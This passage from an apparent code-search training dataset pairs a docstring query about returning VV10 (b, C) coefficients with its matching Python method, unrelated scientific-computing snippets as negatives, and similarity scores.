x1 = inverse.keys()[previous_index]\n result = inverse[x1]\n\n return float(result)\n\n return function", "def beta_star(self):\n return self.reciprocal_lattice_parameters[4]", "def param_quantizers(self):\n return self._param_quantizers", "def normalize_quantities(self):\n return (\n pynini.cdrewrite(self.units_map, \"\", \"\", self.sigma_star, direction=\"ltr\") *\n pynini.cdrewrite(self.singularize_map, \"1 \", \"\", self.sigma_star, direction=\"ltr\") *\n pynini.cdrewrite(self.thousands_map, \"\", self.triple_digits, self.sigma_star, direction=\"ltr\") *\n pynini.cdrewrite(self.hundreds_map, \"\", self.double_digits, self.sigma_star, direction=\"ltr\") *\n pynini.cdrewrite(self.tens_map, \"\", self.digits, self.sigma_star, direction=\"ltr\") *\n pynini.cdrewrite(self.teens_map, \"\", \"\", self.sigma_star, direction=\"ltr\") *\n pynini.cdrewrite(self.ones_map, \"\", \"\", self.sigma_star, direction=\"ltr\") *\n pynini.cdrewrite(self.zero_del, \"\", \"\", self.sigma_star, direction=\"ltr\")\n )", "def betabinom_B(k,n, alpha,beta, precision=50):\n mp.dps = precision # Set 
precision\n #return float( mpmath.gamma(k+alpha) * mpmath.gamma(n-k+beta) / mpmath.gamma(alpha+n+beta) )\n return float(mpmath.beta(k+alpha, n-k+beta))", "def params(self) -> Iterable[sympy.Symbol]:\n for i in range(self.iterations):\n for p in range(len(self.qubits)):\n if (self.include_all_z or not\n numpy.isclose(self.orbital_energies[p], 0)):\n yield LetterWithSubscripts('U', p, i)\n for p, q in itertools.combinations(range(len(self.qubits)), 2):\n if (self.include_all_cz or not\n numpy.isclose(self.hamiltonian.two_body[p, q], 0)):\n yield LetterWithSubscripts('V', p, q, i)", "def bethe_gf_omega(z, t=1.0):\n half_bandwidth = 2 * t\n z_rel = z / half_bandwidth\n return 2. / half_bandwidth * z_rel * (1 - np.sqrt(1 - 1 / (z_rel * z_rel)))", "def get_phi_chi_omega(self, angles):\n phi = angles[0]\n chi = np.deg2rad(self.chi)\n omega = 0\n return (phi, chi, omega)", "def get_xray_delta_beta_intrinsic(self, energy=13.0):\n \n delta, beta = self.get_xray_delta_beta(energy)\n \n delta *= self.get_molecular_weight()/self.get_density()\n beta *= self.get_molecular_weight()/self.get_density()\n \n return delta, beta", "def _se_beta(self):\n return _handle_ab(self._se_all, self.use_const)[1]", "def boost(self):\n ch = self.gamma\n sh = self.gamma*self.beta\n return( np.array( [ [ch, -sh], [-sh, ch] ] ) )", "def get_quantities(seq):\n outcomes = get_outcomes(NUM_DIE_SIDES)\n quants = [seq.count(value) for value in outcomes]\n return quants", "def v_atm_n(f, t, alpha, beta, rho, volvol):\r\n f_av = f\r\n A = - beta * (2 - beta) * alpha**2 / (24 * f_av**(2 - 2 * beta))\r\n B = rho * alpha * volvol * beta / (4 * f_av**(1 - beta))\r\n C = (2 - 3 * rho**2) * volvol**2 / 24\r\n v_atm_n = alpha * f**beta * (1 + (A + B + C) * t)\r\n return v_atm_n", "def HP(Di, beta):\n Pi = np.exp(-Di * beta) / np.sum(np.exp(-Di * beta))\n Hi = - np.sum(Pi * np.log2(Pi))\n return Hi, Pi", "def multivariate (mu, alpha, omega, T, numEvents=None, checkStability=False, seed=None):\n\tprng = sklearn.utils.check_random_state (seed)\n\tdim = mu.shape[0]\n\talpha = alpha.tocsr().toarray() # just keep them dense (I'm sure the simulation can be made faster by exploiting sparsity)\n\tnTotal = 0\n\thistory = list ()\n\t# Initialization\n\tif numEvents is None:\n\t\tnExpected = np.iinfo (np.int32).max\n\telse:\n\t\tnExpected = numEvents\n\ts = 0.0\n\n\tif checkStability:\n\t\tw,v = np.linalg.eig (alpha)\n\t\tmaxEig = np.amax (np.abs(w))\n\t\tif maxEig >= 1:\n\t\t\tprint \"(WARNING) Unstable ... 
max eigen value is: {0}\".format (maxEig)\n\n\tIstar = np.sum(mu)\n\ts += HPUtils.drawExpRV (1./Istar, prng)\n\n\tif s <=T and nTotal < nExpected:\n\t\t# attribute (weighted random sample, since sum(mu)==Istar)\n\t\tn0 = int(prng.choice(np.arange(dim), 1, p=(mu / Istar)))\n\t\thistory.append((n0, s))\n\t\tnTotal += 1\n\n\t# value of \\lambda(t_k) where k is most recent event\n\t# starts with just the base rate\n\tlastrates = mu.copy()\n\n\tdecIstar = False\n\twhile nTotal < nExpected:\n\t\tuj, tj = int (history[-1][0]), history[-1][1]\n\n\t\tif decIstar:\n\t\t\t# if last event was rejected, decrease Istar\n\t\t\tIstar = np.sum(rates)\n\t\t\tdecIstar = False\n\t\telse:\n\t\t\t# otherwise, we just had an event, so recalc Istar (inclusive of last event)\n\t\t\tIstar = np.sum(lastrates) + alpha[uj,:].sum()\n\t\t\t\n\t\ts += HPUtils.drawExpRV (1./Istar, prng)\n\t\tif s > T:\n\t\t\tbreak\n\n\t\t# calc rates at time s (use trick to take advantage of rates at last event)\n\t\trates = mu + HPUtils.kernel (s,tj,omega) * (alpha[uj,:] + lastrates - mu)\n\n\t\t# attribution/rejection test\n\t\t# handle attribution and thinning in one step as weighted random sample\n\t\tdiff = Istar - np.sum(rates)\n\t\tn0 = int (prng.choice(np.arange(dim+1), 1, p=(np.append(rates, diff) / Istar)))\n\n\t\tif n0 < dim:\n\t\t\thistory.append((n0, s))\n\t\t\t# update lastrates\n\t\t\tlastrates = rates.copy()\n\t\t\tnTotal += 1\n\t\telse:\n\t\t\tdecIstar = True\n\n\treturn history", "def get_quantity( self, species, quantity ) :\n\n #NB (for developers): this is a very simple implementation\n #one must take care of the order of search of particle quantities\n #'ux','uy','uz' etc. so that the routine effectively works by just\n #using the replace method on strings. In addition, double character\n #quantities containing other quantitities (e.g 'ex' contains 'x')\n #are replaced with numbered quantities 'e1' to avoid collisions\n #with replace().\n\n dict_keys_val=dict()\n if \"ux\" in quantity :\n dict_keys_val[\"u1\"]=species.getux(gather=False)\n quantity=quantity.replace(\"ux\",\"u1\")\n if \"uy\" in quantity :\n dict_keys_val[\"u2\"]=species.getuy(gather=False)\n quantity=quantity.replace(\"uy\",\"u2\")\n if \"uz\" in quantity :\n dict_keys_val[\"u3\"]=species.getuz(gather=False)\n quantity=quantity.replace(\"uz\",\"u3\")\n if \"ex\" in quantity :\n dict_keys_val[\"e1\"]=species.getex(gather=False)\n quantity=quantity.replace(\"ex\",\"e1\")\n if \"ey\" in quantity :\n dict_keys_val[\"e2\"]=species.getey(gather=False)\n quantity=quantity.replace(\"ey\",\"e2\")\n if \"ez\" in quantity :\n dict_keys_val[\"e3\"]=species.getez(gather=False)\n quantity=quantity.replace(\"ez\",\"e3\")\n if \"bx\" in quantity :\n dict_keys_val[\"b1\"]=species.getbx(gather=False)\n quantity=quantity.replace(\"bx\",\"b1\")\n if \"by\" in quantity :\n dict_keys_val[\"b2\"]=species.getby(gather=False)\n quantity=quantity.replace(\"by\",\"b2\")\n if \"bz\" in quantity :\n dict_keys_val[\"b3\"]=species.getbz(gather=False)\n quantity=quantity.replace(\"bz\",\"b3\")\n if \"w\" in quantity :\n dict_keys_val[\"w\"]=species.getweights(gather=False)\n if \"x\" in quantity :\n dict_keys_val[\"x\"]=species.getx(gather=False)\n if \"y\" in quantity :\n dict_keys_val[\"y\"]=species.gety(gather=False)\n if \"z\" in quantity :\n dict_keys_val[\"z\"]=species.getz(gather=False)\n if \"id\" in quantity:\n # The ssnid is stored in Warp as a float. 
Thus, it needs\n # to be converted to the nearest integer (rint)\n dict_keys_val[\"id\"] = \\\n (np.rint( species.getssn(gather=False) )).astype('uint64')\n\n string_to_exec=quantity\n for keys in dict_keys_val.keys():\n string_to_exec=string_to_exec.replace(keys,\"dict_keys_val[\\'\"+keys+\"\\']\")\n string_to_exec='quantity_array = '+string_to_exec\n local_dict = {'dict_keys_val':dict_keys_val, 'quantity_array':None}\n exec(string_to_exec, globals(), local_dict)\n\n return( local_dict['quantity_array'] )", "def nu(x, beta2):\n return 3 * (1 - beta2 - beta2*x) / beta2 / (1+x)", "def int_z(sigma, omega, mu, tau, T, R, k, d, m_max, epsilon=1):\r\n\r\n term0 = k**2*special.k0(k*d)**2*np.imag(r(0, sigma, omega, mu, tau, T, R, k, epsilon))\r\n terms_array = np.array([k**2*special.kn(m,k*d)**2*np.imag(r(m, sigma, omega, mu, tau, T, R, k, epsilon)) for m in range(1,m_max + 1)])\r\n result = term0 + 2*np.sum(terms_array)\r\n\r\n return result", "def get_xray_delta_beta_intrinsic(self, energy=13.0):\n \n delta, beta = self.get_xray_delta_beta(energy)\n delta *= self.atomic_weight/self.density\n beta *= self.atomic_weight/self.density\n \n return delta, beta" ]
[ "0.67075425", "0.5999553", "0.5995143", "0.59202677", "0.58304745", "0.5786519", "0.5735779", "0.572618", "0.5639546", "0.5626567", "0.5616059", "0.55831593", "0.55683064", "0.55592185", "0.5534734", "0.55158263", "0.54844254", "0.5464986", "0.54503083", "0.54469895", "0.54469895", "0.54469895", "0.5434943", "0.5424529", "0.54205906", "0.5419117", "0.5419117", "0.54167914", "0.5404991", "0.53718054", "0.53624165", "0.5346007", "0.53439355", "0.53205174", "0.53182214", "0.5312419", "0.5306568", "0.5298138", "0.52847075", "0.5282694", "0.52786434", "0.52786434", "0.52780217", "0.526744", "0.526137", "0.526137", "0.52471316", "0.52405244", "0.5230655", "0.52164584", "0.5216119", "0.52156067", "0.52132326", "0.5203649", "0.5199213", "0.5174469", "0.51546615", "0.5151856", "0.5147292", "0.5145322", "0.51220256", "0.51188856", "0.51173496", "0.5114923", "0.5113227", "0.5112019", "0.50958", "0.5086159", "0.5085807", "0.50789833", "0.5078345", "0.50779134", "0.5066369", "0.5059184", "0.50559574", "0.50528127", "0.5044881", "0.50427645", "0.5041627", "0.50396454", "0.50309056", "0.5029234", "0.5028841", "0.5022241", "0.5020143", "0.5013216", "0.50054085", "0.5001823", "0.4999107", "0.4997633", "0.49926496", "0.4990528", "0.4984548", "0.49842045", "0.49727714", "0.4971862", "0.49706924", "0.4970078", "0.4968345", "0.4966744", "0.49661002" ]
0.0
-1
Returns the VV10 (b, C) coefficients
def get_vv10_coef(self): if self._nlc_b is False: raise ValueError("get_vv10_coeff can only be called on -V functionals.") return (self._nlc_b, self._nlc_C)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def coefficients(self):\r\n return self.coef_['x']", "def coefficients(self) :\n raise NotImplementedError", "def b_coefficients(x1,x2,x3,y1,y2,y3,CCoefficients,DCoefficients):\n\tBCoefficients = np.array([\t((y2-y1)/(x2-x1)-CCoefficients[0]*(x2-x1) - DCoefficients[0]*((x2-x1)**2)), \\\n\t\t\t\t\t\t\t\t((y3-y2)/(x3-x2)-CCoefficients[1]*(x3-x2) - DCoefficients[1]*((x3-x2)**2)) \t]).astype(float)\n\treturn(BCoefficients)", "def b10(self,k1,k2,c):\n return 2.0/3.0*(2.0+self.mu)*c.pkInterp(k1)*c.pkInterp(k2)", "def coefficients(self) :\n return self.__coefficients", "def test_coefficients(self):\n\n coefs = self.cs.coefficients\n\n self.assertEqual(coefs, (1, 0, 1, 0, 0, -1))", "def coefficients(self):\n return self._coefficients", "def coefficients(self):\n return self._coefficients", "def c_coefficients(x1,x2,x3,y1,y2,y3,initial_slope,final_slope):\n\tC = c_matrix(x1,x2,x3)\n\ty = y_vector(x1,x2,x3,y1,y2,y3,initial_slope,final_slope)\n\tCCoefficients = np.dot(inv(C),y)\n\treturn(CCoefficients)", "def coefficients(k, xi, x):\n\n import pyweno.cnonuniform\n\n x = np.asarray(x, np.float64)\n xi = np.asarray(xi, np.float64)\n\n nc = len(x) - 1\n n = len(xi)\n c = np.zeros((nc, n, k, k), np.float64)\n beta = np.zeros((nc, k, k, k), np.float64)\n varpi = np.zeros((nc, n, k), np.float64)\n\n pyweno.cnonuniform.nonuniform_coeffs(k, xi, x, c, beta, varpi)\n\n return c, beta, varpi", "def get_coefficients(self):\n return self.coefficients", "def get_coefficients(self):\n return self.coefficients", "def coefficients(self):\n if self._coefficients is None:\n return np.hstack([c.coefficients for c in self._traces])\n return self._coefficients", "def get_base_coefs(mv):\n\trs = []\n\tfor bs in bases:\n\t\tt = []\n\t\tfor b in bs:\n\t\t\tt.append(mv.coef(b))\n\t\t\t\t\t\n\t\trs.append(t)\t\t\n\treturn rs", "def langevin_coefficients(\n temperature,\n dt,\n friction,\n masses):\n vscale = np.exp(-dt*friction)\n if friction == 0:\n fscale = dt\n else:\n fscale = (1-vscale)/friction\n kT = BOLTZ * temperature\n nscale = np.sqrt(kT*(1-vscale*vscale)) # noise scale\n invMasses = 1.0/masses\n sqrtInvMasses = np.sqrt(invMasses)\n\n ca = vscale\n cb = fscale*invMasses\n cc = nscale*sqrtInvMasses\n return ca, cb, cc", "def coefficients(dataset):\r\n x = [row[0] for row in dataset]\r\n y = [row[1] for row in dataset]\r\n x_mean, y_mean = mean(x), mean(y)\r\n b1 = covariance(x, x_mean, y, y_mean) / variance(x, x_mean)\r\n b0 = y_mean - b1 * x_mean\r\n return [b0, b1]", "def coefficients(self) -> np.ndarray:\n return self._coefficients", "def circuit(V, I0, L, C, alpha, beta):\n Vdot = [V[0], V[0]/(psi(np.pi(/2))) # first and second derivative of V\n return Vdot[1] - (1/C) * (alpha - 3*gamma*V[0]**2)*Vdot[0] + 1/(L*C)*V[0]", "def coef_val():\n\n basepath = path.join(path.dirname(path.realpath('__file__')), 'data')\n fdata = basepath + path.sep + 'VAWTPolySurfaceCoef_pub.csv' # published coefficients from paper\n # fdata = basepath + path.sep + 'VAWTPolySurfaceCoef.csv' # polynomial surface fitting coefficients\n\n loc1 = np.zeros(10)\n loc2 = np.zeros(10)\n loc3 = np.zeros(10)\n spr1 = np.zeros(10)\n spr2 = np.zeros(10)\n skw1 = np.zeros(10)\n skw2 = np.zeros(10)\n scl1 = np.zeros(10)\n scl2 = np.zeros(10)\n scl3 = np.zeros(10)\n\n f = open(fdata)\n csv_f = csv.reader(f)\n\n i = 0\n for row in csv_f:\n if i != 0:\n loc1[i-1] = float(row[0])\n loc2[i-1] = float(row[1])\n loc3[i-1] = float(row[2])\n spr1[i-1] = float(row[3])\n spr2[i-1] = float(row[4])\n skw1[i-1] = float(row[5])\n skw2[i-1] = float(row[6])\n 
scl1[i-1] = float(row[7])\n scl2[i-1] = float(row[8])\n scl3[i-1] = float(row[9])\n i += 1\n\n f.close()\n\n return loc1,loc2,loc3,spr1,spr2,skw1,skw2,scl1,scl2,scl3", "def b11(self,k1,k2,c):\n return (k1/k2+k2/k1)*c.pkInterp(k1)*c.pkInterp(k2)", "def coeff(self):\n return self._coeff", "def coefficients(self, force_characters = False) :\n raise NotImplementedError", "def d_coefficients(x1,x2,x3,CCoefficients):\n\tDCoefficients = np.array([\t(CCoefficients[1]-CCoefficients[0])/(3*(x2-x1)), \\\n\t\t\t\t\t\t\t\t(CCoefficients[2]-CCoefficients[1])/(3*(x3-x2))\t], \\\n\t\t\t\t\t\t\t\tfloat)\n\treturn(DCoefficients)", "def coefC(x0,y0,x1,y1):\n return (x1*y0-x0*y1)/(x1-x0)", "def find_coefficients(self):\n self.make_matrix()\n self.coeffs = np.linalg.solve(self.global_matrix,self.global_vector)\n self.coeffs = np.append(self.coeffs, self.D) #Initial condition", "def mvector(B, c):\n # for Sun Mg Potential: c=1.6281689374348\n A = np.zeros(shape=4)\n A[0] = (2 / 3) * B[0]\n A[1] = 0.5 * ((2 / sqrt(3)) * B[1] - A[0])\n A[2] = -A[0] - A[1]\n A[3] = B[2] / c\n return A", "def _coef(ctx, J, eps):\n\n newJ = J+2 # compute more coefficients that are needed\n neweps6 = eps/2. # compute with a slight more precision that are needed\n\n # PREPARATION FOR THE COMPUTATION OF V(N) AND W(N)\n # See II Section 3.16\n #\n # Computing the exponent wpvw of the error II equation (81)\n wpvw = max(ctx.mag(10*(newJ+3)), 4*newJ+5-ctx.mag(neweps6))\n\n # Preparation of Euler numbers (we need until the 2*RS_NEWJ)\n E = ctx._eulernum(2*newJ)\n\n # Now we have in the cache all the needed Euler numbers.\n #\n # Computing the powers of pi\n #\n # We need to compute the powers pi**n for 1<= n <= 2*J\n # with relative error less than 2**(-wpvw)\n # it is easy to show that this is obtained\n # taking wppi as the least d with\n # 2**d>40*J and 2**d> 4.24 *newJ + 2**wpvw\n # In II Section 3.9 we need also that\n # wppi > wptcoef[0], and that the powers\n # here computed 0<= k <= 2*newJ are more\n # than those needed there that are 2*L-2.\n # so we need J >= L this will be checked\n # before computing tcoef[]\n wppi = max(ctx.mag(40*newJ), ctx.mag(newJ)+3 +wpvw)\n ctx.prec = wppi\n pipower = {}\n pipower[0] = ctx.one\n pipower[1] = ctx.pi\n for n in range(2,2*newJ+1):\n pipower[n] = pipower[n-1]*ctx.pi\n\n # COMPUTING THE COEFFICIENTS v(n) AND w(n)\n # see II equation (61) and equations (81) and (82)\n ctx.prec = wpvw+2\n v={}\n w={}\n for n in range(0,newJ+1):\n va = (-1)**n * ctx._eulernum(2*n)\n va = ctx.mpf(va)/ctx.fac(2*n)\n v[n]=va*pipower[2*n]\n for n in range(0,2*newJ+1):\n wa = ctx.one/ctx.fac(n)\n wa=wa/(2**n)\n w[n]=wa*pipower[n]\n\n # COMPUTATION OF THE CONVOLUTIONS RS_P1 AND RS_P2\n # See II Section 3.16\n ctx.prec = 15\n wpp1a = 9 - ctx.mag(neweps6)\n P1 = {}\n for n in range(0,newJ+1):\n ctx.prec = 15\n wpp1 = max(ctx.mag(10*(n+4)),4*n+wpp1a)\n ctx.prec = wpp1\n sump = 0\n for k in range(0,n+1):\n sump += ((-1)**k) * v[k]*w[2*n-2*k]\n P1[n]=((-1)**(n+1))*ctx.j*sump\n P2={}\n for n in range(0,newJ+1):\n ctx.prec = 15\n wpp2 = max(ctx.mag(10*(n+4)),4*n+wpp1a)\n ctx.prec = wpp2\n sump = 0\n for k in range(0,n+1):\n sump += (ctx.j**(n-k)) * v[k]*w[n-k]\n P2[n]=sump\n # COMPUTING THE COEFFICIENTS c[2n]\n # See II Section 3.14\n ctx.prec = 15\n wpc0 = 5 - ctx.mag(neweps6)\n wpc = max(6,4*newJ+wpc0)\n ctx.prec = wpc\n mu = ctx.sqrt(ctx.mpf('2'))/2\n nu = ctx.expjpi(3./8)/2\n c={}\n for n in range(0,newJ):\n ctx.prec = 15\n wpc = max(6,4*n+wpc0)\n ctx.prec = wpc\n c[2*n] = mu*P1[n]+nu*P2[n]\n for n in range(1,2*newJ,2):\n 
c[n] = 0\n return [newJ, neweps6, c, pipower]", "def cost_b_v(self):\n return self._cost_b_v", "def coefficient(self) -> float:\n ...", "def c(self) -> np.ndarray:\n return self._vector[10:12]", "def coef(self):\n return self._coef", "def __init__(self, coefficients):\n self.coefficients = coefficients", "def get_coeffs(self):\n\n return self._coeff_to_dict()", "def get_coefficients_Pd(self):\n B, A = self.get_coefficients()\n return (B[0], B[1], B[2], -A[1], -A[2]) # FIXME: Verify this", "def acc_b_v(self):\r\n return self._acc_b_v", "def xcoeff(self):\n a, c, d, b = self.to_ccw()\n p1, q1 = a + b, c + d\n p2, q2 = a + c, b + d\n n = p1 + q1\n\n cov = self.covar()\n\n if n == 0:\n return np.nan\n elif a == n or d == n:\n return 0.5\n elif b == n or c == n:\n return -1.0\n elif cov > 0.0:\n return _div(cov, min(p1 * q2, p2 * q1))\n elif cov < 0.0:\n return _div(cov, min(n * c, n * b))\n else:\n return 0.0", "def __getTemperatureCalibrationCoefficients(self):\n src10 = self.read_byte_data(self.address, 0x10)\n src11 = self.read_byte_data(self.address, 0x11)\n src12 = self.read_byte_data(self.address, 0x12)\n c0 = (src10 << 4) | (src11 >> 4)\n c0 = getTwosComplement(c0, 12)\n c1 = ((src11 & 0x0F) << 8) | src12\n c1 = getTwosComplement(c1, 12)\n return c0, c1", "def NPV(B,C,BV,CV,d,pb,pc):\n b=[BV[0] if x=='L' else BV[1] for x in B] #decoding revenue\n c=[CV[0] if x=='L' else CV[1] for x in C] #decoding cost\n z=[b_i - c_i for b_i, c_i in zip(b, c)] #profit at each time\n npv=np.npv(d, z)\n pnpv=pb*pc\n return (npv,pnpv)", "def V_int(A, B, Rab2, Rcp2, Zc):\n V = 2.0 * np.pi / (A + B) * F0((A + B) * Rcp2) * np.exp(-A * B * Rab2 / (A + B))\n return -V * Zc", "def pcoef(\n xte,yte,rle,\n x_cre,y_cre,d2ydx2_cre,th_cre,\n surface):\n\n # Initialize coefficients\n coef = np.zeros(6)\n\n # 1st coefficient depends on surface (pressure or suction)\n if surface.startswith('p'):\n coef[0] = -sqrt(2*rle)\n else:\n coef[0] = sqrt(2*rle)\n \n # Form system of equations\n A = np.array([\n [xte**1.5, xte**2.5, xte**3.5, xte**4.5, xte**5.5],\n [x_cre**1.5, x_cre**2.5, x_cre**3.5, x_cre**4.5, \n x_cre**5.5],\n [1.5*sqrt(xte), 2.5*xte**1.5, 3.5*xte**2.5, \n 4.5*xte**3.5, 5.5*xte**4.5],\n [1.5*sqrt(x_cre), 2.5*x_cre**1.5, 3.5*x_cre**2.5, \n 4.5*x_cre**3.5, 5.5*x_cre**4.5],\n [0.75*(1/sqrt(x_cre)), 3.75*sqrt(x_cre), 8.75*x_cre**1.5, \n 15.75*x_cre**2.5, 24.75*x_cre**3.5]\n ]) \n\n B = np.array([\n [yte - coef[0]*sqrt(xte)],\n [y_cre - coef[0]*sqrt(x_cre)],\n [tan(th_cre*pi/180) - 0.5*coef[0]*(1/sqrt(xte))],\n [-0.5*coef[0]*(1/sqrt(x_cre))],\n [d2ydx2_cre + 0.25*coef[0]*x_cre**(-1.5)]\n ])\n \n # Solve system of linear equations\n try:\n X = np.linalg.solve(A,B)\n except:\n X = np.linalg.solve(A+(1e-12*np.eye(5)),B)\n\n\n # Gather all coefficients\n coef[1:6] = X[0:5,0]\n\n # Return coefficients\n return coef", "def C(self, r, n=None):\n return self.get_coefficient(r, n)", "def coeffroot(self):\n return self._coeffroot", "def calculate_coefficients(self, start, end):\n A = np.array([\n [self.deltaT**3, self.deltaT**4, self.deltaT**5],\n [3 * self.deltaT**2, 4 * self.deltaT**3, 5 * self.deltaT**4],\n [6 * self.deltaT, 12 * self.deltaT**2, 20 * self.deltaT**3],\n ])\n\n a_0, a_1, a_2 = start[0], start[1], start[2] / 2.0\n c_0 = a_0 + a_1 * self.deltaT + a_2 * self.deltaT**2\n c_1 = a_1 + 2 * a_2 * self.deltaT\n c_2 = 2 * a_2\n\n B = np.array([\n end[0] - c_0,\n end[1] - c_1,\n end[2] - c_2\n ])\n\n a_3_4_5 = np.linalg.solve(A, B)\n coeff = np.concatenate((np.array([a_0, a_1, a_2]), a_3_4_5))\n\n return coeff", "def 
objfCVaR(self, beta, q, N):\n cvec = r_[1, zeros((N)), 1/(1-beta)*1/q*ones((q))];\n return cvec", "def C_V(self):\n return self.generic_getter(\n get_heat_capacity_volume, \"C_V\", \"convert_heat_capacity\"\n )", "def F(cst, x):\n [u0, v0, u1, v1, u2, v2, coeffs] = cst\n [u, v, g1, g2, g3] = x\n a = g1*u1 - u0\n b = g2*u2 - u0\n c = g3*u - u0\n l = g1*v1 - v0 \n m = g2*v2 - v0\n n = g3*v - v0\n r = g1 - 1\n s = g2 - 1\n t = g3 - 1\n return np.array([\n coeffs[0]*(a**2-l**2) + 2*coeffs[1]*(a*b-l*m) + coeffs[2]*(b**2-m**2) + 2*coeffs[3]*(a*c-l*n) + 2*coeffs[4]*(b*c-m*n) + c**2 - n**2,\n coeffs[0]*(l**2-r**2) + 2*coeffs[1]*(l*m-r*s) + coeffs[2]*(m**2-s**2) + 2*coeffs[3]*(l*n-r*t) + 2*coeffs[4]*(m*n-s*t) + n**2 - t**2,\n coeffs[0]*a*l + coeffs[1]*(l*b+m*a) + coeffs[2]*m*b + coeffs[3]*(l*c+n*a) + coeffs[4]*(m*c+b*n) + c*n,\n coeffs[0]*a*r + coeffs[1]*(r*b+s*a) + coeffs[2]*s*b + coeffs[3]*(r*c+t*a) + coeffs[4]*(s*c+b*t) + c*t,\n coeffs[0]*r*l + coeffs[1]*(l*s+m*r) + coeffs[2]*m*s + coeffs[3]*(l*t+n*r) + coeffs[4]*(m*t+s*n) + t*n \n ])", "def test_coefficients_torch_interface(self):\n import torch\n\n qnode = qml.QNode(self.circuit, self.dev)\n\n weights = torch.tensor([0.5, 0.2])\n\n obtained_result = coefficients(partial(qnode, weights), 2, 1)\n\n assert np.allclose(obtained_result, self.expected_result)", "def get_coeffs(b, q0, hL, g):\n\n C0 = q0 * q0 / (2. * g)\n C1 = b - C0 / (hL * hL) - hL\n\n return C0, C1", "def dV(X):\n return -4 * a * np.power(X, 3) + 2 * b * X", "def _vB0(self,x):\n return 2.4e3*x**0.5/(2+x**0.5)+8.e2", "def getCoeff(self, path, prefix, verbose = True):\n\n fpath = path + prefix + \".coeff\"\n # print 'get coeff path', fpath\n\n if not os.path.isfile(fpath):\n if verbose: print \".coeff file not found - please check!\"\n return False\n\n with open(fpath, \"rb\") as f:\n s = np.fromfile(f, count=4, dtype=np.int32)\n NFILT, NTEMP, NZ, NOBJ = s[0], s[1], s[2], s[3]\n coeffs = np.fromfile(f, count = NOBJ*NTEMP, dtype = np.double).reshape((NOBJ, NTEMP))\n izbest = np.fromfile(f, count = NOBJ, dtype = np.int32)\n tnorm = np.fromfile(f, count = NTEMP, dtype = np.double)\n\n keys = ['NFILT','NTEMP','NZ','NOBJ','coeffs','izbest','tnorm']\n values = [NFILT, NTEMP, NZ, NOBJ, coeffs, izbest, tnorm]\n\n if verbose: print \".coeff file found and read in correctly!\"\n return dict(zip(keys, values))", "def nth_order_const_coeff(*coeffs: List[Symbol], t: Symbol = t) -> Tuple[List[Symbol], Procedure]:\n\n # First, set up characteristic equation.\n char_eq_r, r = sympy.S.Zero, Dummy('r')\n\n for order, coeff in enumerate(coeffs[::-1]):\n char_eq_r += coeff * r ** order\n\n char_eq = Poly(char_eq_r, r)\n\n # Can't just call roots because it doesn't return rootof for unsolveable\n # polynomials.\n char_eq_roots = roots(char_eq, multiple=True)\n\n root_dict = defaultdict(int) # type: Dict[int, int]\n\n conjugate_roots = []\n for root in char_eq_roots:\n root_dict[root] += 1\n\n sols = []\n for root, mult in root_dict.items():\n for i in range(mult):\n if isinstance(root, RootOf):\n sols.append(t**i * exp(root*t))\n elif root.is_real:\n sols.append(t**i*exp(root*t))\n else:\n if root in conjugate_roots:\n continue\n reroot = re(root)\n imroot = im(root)\n conjugate_roots.append(conjugate(root))\n sols.append(t**i*exp(reroot*t) * sin(abs(imroot) * t))\n sols.append(t**i*exp(reroot*t) * cos(imroot * t))\n\n # collect roots for display\n p_roots = []\n count = 1\n for root, mult in root_dict.items():\n p_roots.append(Eq(Dummy('r_{}'.format(\n \",\".join([str(i) for i in range(count, count + 
mult)]))), root, evaluate=False))\n count += mult\n\n procedure = Procedure()\n procedure\\\n .text('Characteristic equation: ', nl=True)\\\n .eq(Eq(char_eq_r, 0, evaluate=False))\\\n .text('Roots: ')\\\n .equarr(p_roots)\\\n .text('General Solution: ', nl=True)\\\n .eq(Eq(Dummy('y'), to_general(sols)[0], evaluate=False))\n\n return sols, procedure", "def coefficients(self, force_characters = False) :\n if len(self.__coefficients) == 0 :\n return dict()\n elif not force_characters and len(self.__coefficients) == 1 :\n return self.__coefficients.values()[0] \n else :\n return self.__coefficients", "def calibration(N,kb,T,Ekinv,V):\n lamb = np.sqrt((N-1)*3*kb*T/(Ekinv*2))\n \n if lamb < 0.9999:\n V = lamb*V\n elif lamb>1.0001:\n V = lamb*V\n \n return V", "def test_cels():\n N = 999\n kcc = (np.random.rand(N) - 0.5) * 10\n pp = (np.random.rand(N) - 0.5) * 10\n cc = (np.random.rand(N) - 0.5) * 10\n ss = (np.random.rand(N) - 0.5) * 10\n\n res0 = [cel0(kc, p, c, s) for kc, p, c, s in zip(kcc, pp, cc, ss)]\n res1 = celv(kcc, pp, cc, ss)\n res2 = cel(kcc, pp, cc, ss)\n\n assert np.allclose(res0, res1)\n assert np.allclose(res1, res2)", "def _coefficients(regression_df):\n coeff_names = ('mindist', 'x_j', 'f_is', 'v_is')\n coefficients = {x: _get_coefficient(regression_df, x) for x in coeff_names}\n return coefficients", "def vcapcharge(t, Vs, R, C):\n if t < 0:\n raise ValueError(\"Time must be greater than or equal to zero.\")\n if R * C == 0:\n raise ValueError(\"Resistance and Capacitance must be non-zero.\")\n Vc = Vs * (1 - _np.exp(-t / (R * C)))\n return Vc", "def coeff_b(nrows, ncols) -> np.ndarray:\n coeff_array = np.zeros((nrows, ncols), dtype=\"complex_\")\n for idx, _ in np.ndenumerate(coeff_array):\n coeff_array[idx] = 1j * (idx[0] - idx[1])\n return coeff_array", "def CirculationFromPrescribedCt(vr_bar,vCt,Lambda,bSwirl):\n vk = np.zeros(vr_bar.shape)\n vlambda_r = Lambda * vr_bar\n if bSwirl:\n for ir,(r_bar,lambda_r,Ct) in enumerate(zip(vr_bar,vlambda_r,vCt)):\n if Ct>0 and r_bar>0:\n res=sciopt.minimize_scalar(lambda k:np.abs(k*(1+k/(4*lambda_r**2))-Ct), bounds=[0,1.8], method='bounded')\n vk[ir] = res.x\n else:\n vk = vCt\n return vk", "def CirculationFromPrescribedCt(vr_bar,vCt,Lambda,bSwirl):\n vk = np.zeros(vr_bar.shape)\n vlambda_r = Lambda * vr_bar\n if bSwirl:\n for ir,(r_bar,lambda_r,Ct) in enumerate(zip(vr_bar,vlambda_r,vCt)):\n if Ct>0 and r_bar>0:\n res=sciopt.minimize_scalar(lambda k:np.abs(k*(1+k/(4*lambda_r**2))-Ct), bounds=[0,1.8], method='bounded')\n vk[ir] = res.x\n else:\n vk = vCt\n return vk", "def get_conditional_probs_asbf( p01, p10, v):\n\n ns,L =v.shape\n if ns != 2**L:\n raise ValueError\n #matrix of conitional probs.\n pi = np.zeros((ns,ns))\n 